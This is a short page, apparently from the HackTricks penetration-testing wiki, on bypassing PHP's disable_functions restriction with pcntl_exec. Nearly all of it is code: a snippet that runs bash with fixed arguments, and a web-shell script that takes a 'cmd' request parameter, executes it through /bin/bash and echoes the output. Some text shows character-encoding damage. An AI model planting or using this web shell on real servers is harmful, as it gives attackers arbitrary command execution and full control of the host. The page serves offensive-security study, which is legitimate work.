Skip to content
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

PHP 4 >= 4.2.0, PHP 5 pcntl_exec โ€‹

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

php
<?php
$dir = '/var/tmp/';
$cmd = 'ls';
$option = '-l';
$pathtobin = '/bin/bash';
 
$arg = array($cmd, $option, $dir);
 
pcntl_exec($pathtobin, $arg);
echo '123';
?>
<?php
$cmd = @$_REQUEST[cmd];
if(function_exists('pcntl_exec')) {
    $cmd = $cmd."&pkill -9 bash >out";
    pcntl_exec("/bin/bash", $cmd);
    echo file_get_contents("out");        
} else {
        echo 'ไธๆ”ฏๆŒpcntlๆ‰ฉๅฑ•';
}
?>
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: